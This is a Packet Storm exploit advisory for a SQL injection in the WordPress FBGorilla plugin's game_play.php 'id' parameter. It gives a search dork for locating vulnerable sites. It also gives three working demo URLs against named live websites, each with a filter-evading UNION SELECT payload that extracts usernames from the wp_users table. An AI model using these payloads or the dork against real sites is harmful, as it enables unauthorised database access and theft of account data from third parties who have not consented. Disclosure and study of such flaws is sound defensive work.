WordPress FBGorilla plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
f89f508dfe6ffe796d290addc918b30d1491a26d310f6cc72ac228fda1c72c98##############
# Exploit Title : Wordpress fbgorilla plugin SQL INJECTION
#
# Exploit Author : Ashiyane Digital Security Team
#
# vendor Home : http://wordpress.org/
#
# Home : www.Ashiyane.org
#
# Security Risk : HIgh
#
# Dork : inurl:wp-content/plugins/fbgorilla/game_play.php?id=
#
##############
#Location : wp-content/plugins/fbgorilla/game_play.php?id=[SQL]
#
#
#Dem0:
# http://online-super-store.net/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
# http://hip-hop-abs.nl/wp-content/plugins/fbgorilla/game_play.php?id=-233+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
# http://fbgorilla.mobilemarketcreator.com/wp-content/plugins/fbgorilla/game_play.php?id=-233+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed